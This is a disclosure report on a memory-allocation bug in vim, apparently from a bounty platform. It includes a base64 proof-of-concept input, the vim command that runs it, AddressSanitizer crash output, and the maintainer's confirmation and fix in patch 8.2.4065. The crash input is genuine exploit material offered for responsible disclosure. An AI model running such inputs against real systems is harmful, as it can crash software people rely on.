Allocation of Resources Without Limits or Throttling in vim/vim

Valid

Reported on

Jan 10th 2022

Description

Memory Allocation with Excessive Size Value

Proof of Concept

base64 poc
aAp2ewp5Nzc3Nzc3Nzc3Nzc3Nzc3Nzc3NzcKXQo=

vim  -u NONE -X -Z -e -s -S ./poc -c :qa!
==1206187==ERROR: AddressSanitizer: requested allocation size 0xfffffffffffffff8 (0x7f8 after adjustments for alignment, red zones etc.) exceeds maximum supported size of 0x10000000000 (thread T0)
    #0 0x49626d in malloc (/home/aidai/fuzzing/vim/fuzz/bin/vim+0x49626d)
    #1 0x4c5d75  (/home/aidai/fuzzing/vim/fuzz/bin/vim+0x4c5d75)
We are processing your report and will contact the vim team within 24 hours. a year ago
We have contacted a member of the vim team and are waiting to hear back a year ago
Bram Moolenaar validated this vulnerability a year ago
aidaip has been awarded the disclosure bounty
The fix bounty is now up for grabs
Bram Moolenaar
a year ago

Maintainer

I can reproduce the problem. It would cause the allocation to fail, I don't see any other side effect. I can solve it anyway.

Bram Moolenaar
a year ago

Maintainer

Fixed by patch 8.2.4065, which adds a simple test based on the POC.

Bram Moolenaar marked this as fixed in 8.2 with commit 3cf21b a year ago
Bram Moolenaar has been awarded the fix bounty
This vulnerability will not receive a CVE
to join this conversation